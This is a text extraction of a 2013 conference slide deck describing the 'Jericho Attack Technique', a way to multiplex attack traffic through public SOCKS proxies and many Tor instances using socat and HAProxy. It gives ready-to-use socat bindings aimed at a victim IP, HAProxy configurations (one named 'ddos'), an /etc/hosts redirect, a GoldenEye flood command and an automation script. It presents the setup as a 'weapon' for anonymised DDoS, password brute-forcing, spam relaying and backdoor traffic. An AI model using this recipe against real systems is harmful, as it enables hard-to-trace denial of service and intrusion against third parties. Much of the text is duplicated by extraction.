Download - Jericho Attack Technique

Jericho Attack TechniqueJericho Attack TechniqueCluster-bombing TCP attacks for maximum impactCluster-bombing TCP attacks for maximum impact

Jan SeidlJan [email protected]@wroot.org

@jseidl@jseidl

mailto:[email protected]

$ whoami$ whoamiAboutAbout

Full Name: Jan SeidlFull Name: Jan Seidl

Origin: Rio de Janeiro, RJ – BrazilOrigin: Rio de Janeiro, RJ – Brazil

Work:Work:● CTO @ TI SafeCTO @ TI Safe● OpenSource contributor for: PEV, LogstashOpenSource contributor for: PEV, Logstash● Codes and snippets @ github.com/jseidlCodes and snippets @ github.com/jseidl

Features:Features:● UNIX Evangelist/Addict/Freak (but no fanboy!)UNIX Evangelist/Addict/Freak (but no fanboy!)● Python and C loverPython and C lover● Coffee dependentCoffee dependent● Hates printers and social networksHates printers and social networks● Proud DC Labs ResearcherProud DC Labs Researcher Jericho Attack Technique. SEIDL, Jan

ValeSecConf/2013 – São Jose dos Campos, Brazil

$ whoami$ whoami

Jericho Attack Technique. SEIDL, JanValeSecConf/2013 – São Jose dos Campos, Brazil

$ whoami$ whoami


STUPID, BROKE, NERD, BROKESTUPID, BROKE, NERD, BROKE

DisclaimerDisclaimer

‘‘Jericho’ is a product from the fictional company ‘Stark Jericho’ is a product from the fictional company ‘Stark

Industries’ from “The Iron Man” movie franchise from Industries’ from “The Iron Man” movie franchise from

Paramount Pictures and Marvel Studios, as well as any Paramount Pictures and Marvel Studios, as well as any

related picture presented in this presentation.related picture presented in this presentation.

Please do not sue me.Please do not sue me.


\x00 Overview\x00 Overview

\x01 Application / Uses \x01 Application / Uses

\x02 Required Parts\x02 Required Parts

\x03 Weapon Assembly\x03 Weapon Assembly

\x04 Weapon Tuning\x04 Weapon Tuning

\x05 Launching the attack\x05 Launching the attack

\x06 Weapon Maintenance\x06 Weapon Maintenance

\x07 Escalating Firepower\x07 Escalating Firepower

\x08 Turning into a Smart Weapon\x08 Turning into a Smart Weapon

\x09 Demo!\x09 Demo!


AgendaAgenda

Jericho Attack Technique. SEIDL, Jan


OverviewOverview

The attack consists on utilizing The attack consists on utilizing public SOCKS proxiespublic SOCKS proxies

and and TOR instancesTOR instances through through socket multiplexing socket multiplexing

softwaresoftware (e.g.: Load Balancing/Cluster software) as (e.g.: Load Balancing/Cluster software) as

relays for attacks in a load-balancing fashionrelays for attacks in a load-balancing fashion

At a glance



OverviewOverview

public SOCKS proxies + TOR instances + socket public SOCKS proxies + TOR instances + socket

multiplexing softwaremultiplexing software

At a glance



OverviewOverviewAt a glance



OverviewOverviewSchematics

Attacker

Proxy 1

Proxy 2

Proxy 3

Proxy 4

Proxy 5

Proxy 6

Proxy 7

VictimHAProxy



OverviewOverview

Evading connection and rate limitingEvading connection and rate limiting

Bypassing country/origin restrictionsBypassing country/origin restrictions

Hiding origin of attacks, making forensics people sad :(Hiding origin of attacks, making forensics people sad :(

Low bandwidth attack such as Layer 7 DOS attacksLow bandwidth attack such as Layer 7 DOS attacks

Very efficient for

Ataques DoS Super Eficientes: Layer 7, Android, load balancing e Tor (pt_BR)Ataques DoS Super Eficientes: Layer 7, Android, load balancing e Tor (pt_BR)http://slidesha.re/14yYiuVhttp://slidesha.re/14yYiuV



Overview Overview

At first HAProxy may seem as a load balancer strictly At first HAProxy may seem as a load balancer strictly

for HTTP(S), but it’s not. for HTTP(S), but it’s not.

HAProxy’s actual description is “The Reliable, High HAProxy’s actual description is “The Reliable, High

Performance Performance TCPTCP/HTTP Load Balancer”. /HTTP Load Balancer”.

Cool, huh? Cool, huh?

Paying closer attention



Uses Uses Applications for the Jericho Attack Technique



Uses Uses

Web scraping/spideringWeb scraping/spidering

Limited API requestsLimited API requests

IP-based anti-fraud schemes (eg: Online Voting)IP-based anti-fraud schemes (eg: Online Voting)

User enumerationUser enumeration

Password brute-forcingPassword brute-forcing

Basic multiplexing use



Uses Uses

Making Layer 7 Denial-of-Service attacks into Making Layer 7 Denial-of-Service attacks into

distributed configuration (DoS → DdoS)distributed configuration (DoS → DdoS)

(I like this one very much in particular)(I like this one very much in particular)

Hitting hard



Uses Uses

Multiplexing mail relays for SPAMMultiplexing mail relays for SPAM

Multiplexing and anonymizing backdoor connections / Multiplexing and anonymizing backdoor connections /

commandscommands

Even more? Go crazy!Even more? Go crazy!

Going deeper



Uses Uses

FTPFTP

SMTP(S) POP3(S) IMAP(S)SMTP(S) POP3(S) IMAP(S)

SSHSSH

RDP / VNCRDP / VNC

MySQLMySQL

many more...many more...

Possibly supported protocols



Required partsRequired partsBuilding the weapon



Required partsRequired partsMain assembly

Socat: Multipurpose RelaySocat: Multipurpose Relayhttp://www.dest-unreach.org/socat/http://www.dest-unreach.org/socat/

SSL support:SSL support:

HTTPS, IMAPS, POPS, LDAPSHTTPS, IMAPS, POPS, LDAPS



Required partsRequired partsMain assembly

HAProxyHAProxyhttp://haproxy.1wt.eu/http://haproxy.1wt.eu/

““The Reliable, High Performance TCP/HTTP Load The Reliable, High Performance TCP/HTTP Load

Balancer”Balancer”

REQUEST → HAPROXY → { SERVER A, SERVER B, REQUEST → HAPROXY → { SERVER A, SERVER B,

SERVER C }SERVER C }



Required partsRequired partsResources

SOCKS/HTTP(S) ProxiesSOCKS/HTTP(S) Proxies

http://www.proxynova.com/proxy-server-list/http://www.proxynova.com/proxy-server-list/

http://hidemyass.com/proxy-list/http://hidemyass.com/proxy-list/

Just google it...Just google it...

http://www.proxynova.com/proxy-server-list/

http://hidemyass.com/proxy-list/



Required partsRequired partsResources

TOR exit nodesTOR exit nodes

PRO TIP: You can run as many TOR tunnels as you want (:PRO TIP: You can run as many TOR tunnels as you want (:

tor --RunAsDaemon 1 --CookieAuthentication 0 tor --RunAsDaemon 1 --CookieAuthentication 0

--HashedControlPassword "pwd" --ControlPort 4444 --PidFile --HashedControlPassword "pwd" --ControlPort 4444 --PidFile

torN.pid --SocksPort 9050 --DataDirectory data/torNtorN.pid --SocksPort 9050 --DataDirectory data/torN

Multi-TORMulti-TOR

https://github.com/jseidl/Multi-TOR/https://github.com/jseidl/Multi-TOR/

EX: ./multi-tor.sh 5 # Opens 5 TOR instancesEX: ./multi-tor.sh 5 # Opens 5 TOR instances

https://github.com/jseidl/Multi-TOR/



Required partsRequired partsImportant Note

The proxies may or may not require authentication since socat The proxies may or may not require authentication since socat

supports proxy authentication adding the parameter as follows:supports proxy authentication adding the parameter as follows:

proxyauth=user:passproxyauth=user:pass




Some public proxies append additional headers like X-Forwarded-For that Some public proxies append additional headers like X-Forwarded-For that

may ruin the whole purpose of utilizing a Jericho attack perspective. may ruin the whole purpose of utilizing a Jericho attack perspective.

(Thanks for Lucas Fernando Amorim for remembering that!)(Thanks for Lucas Fernando Amorim for remembering that!)




For TOR, one can use For TOR, one can use two-hop circuits for maximum two-hop circuits for maximum

performance and degraded anonymityperformance and degraded anonymity or or greater-hop greater-hop

circuits for greater anonymity and degraded performancecircuits for greater anonymity and degraded performance. .

It just depends on the use.It just depends on the use.

Tor: Four Hops instead of ThreeTor: Four Hops instead of Threehttp://coldwaterq.com/?11http://coldwaterq.com/?11

TOR Auto-circuitTOR Auto-circuithttps://thesprawl.org/projects/tor-autocircuit/https://thesprawl.org/projects/tor-autocircuit/

TOR control protocolTOR control protocolhttps://thesprawl.org/research/tor-control-protocol/https://thesprawl.org/research/tor-control-protocol/

http://coldwaterq.com/?11

https://thesprawl.org/projects/tor-autocircuit/

https://thesprawl.org/research/tor-control-protocol/



Required partsRequired parts(not so) Important Note

I’ve developed a python tool named (albeit not very creatively) I’ve developed a python tool named (albeit not very creatively) proxygetproxyget..

BeautifulSoup + Mechanize = Smart Scraping!BeautifulSoup + Mechanize = Smart Scraping!

Scripting → HAProxy.conf auto-generation for a Jericho attackScripting → HAProxy.conf auto-generation for a Jericho attack

This tool is yet to be released. Stay tuned!This tool is yet to be released. Stay tuned!



Weapon AssemblyWeapon AssemblySticking the parts together

Easy simple steps:Easy simple steps:

1. Create lots of socat bindings to the victim, each from a 1. Create lots of socat bindings to the victim, each from a different resource (proxy or TOR instance)different resource (proxy or TOR instance)

2. Configure the locally bound socat ports in HAProxy2. Configure the locally bound socat ports in HAProxy

3. Point victim's DNS name to localhost on /etc/hosts3. Point victim's DNS name to localhost on /etc/hosts

4. Fire at will4. Fire at will



Weapon AssemblyWeapon AssemblySticking the parts together: socat with proxies

# socat TCP4-LISTEN:80 # socat TCP4-LISTEN:80 PROXY:<PROXY_IP>:<VICTIM_IP>:80,proxyport=<PROXY_PORT>PROXY:<PROXY_IP>:<VICTIM_IP>:80,proxyport=<PROXY_PORT>

# socat TCP4-LISTEN:8081 # socat TCP4-LISTEN:8081 PROXY:190.221.25.225:93.184.216.119:80,proxyport=8080PROXY:190.221.25.225:93.184.216.119:80,proxyport=8080

Example:Example:



Weapon AssemblyWeapon AssemblySticking the parts together: socat with TOR

# socat TCP4LISTEN:80,fork # socat TCP4LISTEN:80,fork SOCKS4A:localhost:<VICTIM_IP>:80,socksport=9050 SOCKS4A:localhost:<VICTIM_IP>:80,socksport=9050

# socat TCP4-LISTEN:8081 # socat TCP4-LISTEN:8081 SOCKS4A:localhost:93.184.216.119:80,socksport=9050SOCKS4A:localhost:93.184.216.119:80,socksport=9050

Example:Example:



Weapon AssemblyWeapon AssemblySticking the parts together: HAProxy

listen ddos 0.0.0.0:80listen ddos 0.0.0.0:80 mode tcpmode tcp balancebalance roundrobinroundrobin serverserver inst1 localhost:8080inst1 localhost:8080 serverserver inst2 localhost:8081inst2 localhost:8081 serverserver inst3 localhost:8082inst3 localhost:8082 serverserver inst4 localhost:8083inst4 localhost:8083



Weapon AssemblyWeapon AssemblySticking the parts together: HAProxy (larger sample)

globalglobal maxconn 10000 maxconn 10000 # set this accordingly to MAX within your kernel socket limits# set this accordingly to MAX within your kernel socket limits user haproxyuser haproxy group haproxygroup haproxy daemondaemon

defaultsdefaults mode tcp mode tcp retries 3retries 3 option redispatchoption redispatch maxconn 20000 maxconn 20000 # set accordingly# set accordingly contimeout 5000 contimeout 5000 # set accordingly# set accordingly clitimeout 50000 clitimeout 50000 # set accordingly# set accordingly srvtimeout 50000 srvtimeout 50000 # set accordingly# set accordingly

# Below we are configuring our socket list. You may mix TOR sockets with SOCKS-proxied # Below we are configuring our socket list. You may mix TOR sockets with SOCKS-proxied sockets. sockets.

listen jericho 0.0.0.0:80 listen jericho 0.0.0.0:80 # just a instance name# just a instance name mode tcp mode tcp balance roundrobin balance roundrobin # gives more time within socket/outoging IP reuse# gives more time within socket/outoging IP reuse server inst1 localhost:8080 server inst1 localhost:8080 # SOCKS proxy# SOCKS proxy server inst2 localhost:9051 server inst2 localhost:9051 # TOR instance# TOR instance server inst3 localhost:9052 server inst3 localhost:9052 # TOR instance# TOR instance



Weapon AssemblyWeapon AssemblySticking the parts together: /etc/hosts

# Jericho target below this line# Jericho target below this line# make him suffer (:# make him suffer (:example.com, www.example.comexample.com, www.example.com 127.0.0.1127.0.0.1



Weapon AssemblyWeapon AssemblyTa-da!



Weapon TuningWeapon TuningMoar firepower!Moar firepower!



Weapon TuningWeapon TuningAbout performanceAbout performance

There are several parameters on the linux kernel that can be There are several parameters on the linux kernel that can be

tuned in order to achieve better TCP performance. tuned in order to achieve better TCP performance.

Because ‘performance’ is relative to the attack being conducted Because ‘performance’ is relative to the attack being conducted

(you may need more bandwidth or more concurrent connections (you may need more bandwidth or more concurrent connections

or anything else), there are several options that one must or anything else), there are several options that one must

consider.consider.



Weapon TuningWeapon TuningLinux Tuning ResourcesLinux Tuning Resources

TCP Performance Tuning | SoftpanoramaTCP Performance Tuning | Softpanoramahttp://bit.ly/17RiLWvhttp://bit.ly/17RiLWv

Linux Tweaking | Speedguide.netLinux Tweaking | Speedguide.nethttp://bit.ly/18JDnlLhttp://bit.ly/18JDnlL

Improving TCP performance over a gigabit network with lots of Improving TCP performance over a gigabit network with lots of

connections and high traffic of small packets | ServerFaultconnections and high traffic of small packets | ServerFaulthttp://bit.ly/1fRyjhZhttp://bit.ly/1fRyjhZ

Linux TCP/IP Tuning | LognormalLinux TCP/IP Tuning | Lognormalhttp://bit.ly/17Rj8QNhttp://bit.ly/17Rj8QN

http://bit.ly/17RiLWv

http://bit.ly/18JDnlL

http://bit.ly/1fRyjhZ

http://bit.ly/17Rj8QN



Launching the attackLaunching the attack



Launching the attackLaunching the attackCheck that everything is workingCheck that everything is working

You may want to socat resources first to an IP testing website to You may want to socat resources first to an IP testing website to

verify that Jericho is working successfullyverify that Jericho is working successfully

Then rebind sockets to final destination (victim)Then rebind sockets to final destination (victim)

(don't forget the /etc/hosts entry!)(don't forget the /etc/hosts entry!)



Launching the attackLaunching the attackFire in the hole!Fire in the hole!

# ./goldeneye.py http://www.example.com/index.php -t # ./goldeneye.py http://www.example.com/index.php -t

1000 -m get1000 -m get

Ahhh... easy and transparent!Ahhh... easy and transparent!



Launching the attackLaunching the attackFire in the hole!Fire in the hole!



Weapon MaintenanceWeapon Maintenance




Check if your exit proxies are still working and not blockedCheck if your exit proxies are still working and not blocked

Check if your TOR identities aren't blockedCheck if your TOR identities aren't blocked

Gather new proxies and reconfigureGather new proxies and reconfigure

Renew TOR identities (tor_newid.sh, part of Multi-TOR)Renew TOR identities (tor_newid.sh, part of Multi-TOR)

Keeping the blade sharpKeeping the blade sharp




Watchdog daemons / scriptsWatchdog daemons / scripts

Cron jobsCron jobs

Manual checkingManual checking

Keeping the blade sharpKeeping the blade sharp



Escalating FirepowerEscalating Firepower

Multiple Jericho setups on many hostsMultiple Jericho setups on many hosts

++

Intermediary Forwarder/Multiplexer Jericho node(s)Intermediary Forwarder/Multiplexer Jericho node(s)

++

Multiple or single attack sourcesMultiple or single attack sources

Large-size clustered attack environmentsLarge-size clustered attack environments




Single-tier cascading Jericho architechtureSingle-tier cascading Jericho architechture




Multi-tier cascading Jericho architechtureMulti-tier cascading Jericho architechture



Turning into a smart weaponTurning into a smart weapon



Turning into a smart weaponTurning into a smart weaponInitialization SequenceInitialization Sequence

Define Resources

multi-tor.sh

proxyget.py IP PORTlist

TOR socketlist

joinlists.sh jericho.res



Turning into a smart weaponTurning into a smart weaponAutomatic testingAutomatic testing

testresources.shjericho.resall resources

valid?proceed

gather andrevalidate resources



Turning into a smart weaponTurning into a smart weaponSelf-configurationSelf-configuration

initjericho.sh

list2socat.sh

list2haproxycfg.sh haproxy.cfg

jericho.resreload

haproxy



Turning into a smart weaponTurning into a smart weaponFull routineFull routine

Initialize Configure Test Run



Turning into a smart weaponTurning into a smart weaponPoor-man's smart JerichoPoor-man's smart Jericho

# Gather proxy list

./proxyget.py --minanon high --minspd medium --type http --quantity 200

> /tmp/proxies

# Parse list

cut -f3,7 -d' ' /tmp/proxies > /tmp/parsedproxy

# Spawn socat entries

./gensocat.sh 93.184.216.119 /tmp/parsedproxy

# Reconfigure haproxy

echo "$HAPROXYCONF_HEAD" > /tmp/haproxy

./genhaproxycfg.sh 200 >> /tmp/haproxy

cp /etc/haproxy/haproxy.cfg /etc/haproxy/haproxy.cfg.old

cp /tmp/haproxy /etc/haproxy/haproxy.cfg

/etc/init.d/haproxy restart



Turning into a smart weaponTurning into a smart weaponWhat else?What else?

Web Interfaces?Web Interfaces?

API?API?

Cloud-hosted?Cloud-hosted?

Quick-deploy packages?Quick-deploy packages?

Jericho-as-a-Service (JaaS)?Jericho-as-a-Service (JaaS)?



Demo (:Demo (:

Jericho Attack Technique @ YouTubeJericho Attack Technique @ YouTubehttp://youtu.be/YRMyW2OA0gIhttp://youtu.be/YRMyW2OA0gI

http://youtu.be/YRMyW2OA0gI



Questions?Questions?



Thank you!Thank you!

– – To peace!To peace!

[email protected] / @jseidl / http://wroot.org

mailto:[email protected]

Download - Jericho Attack Technique

Top Related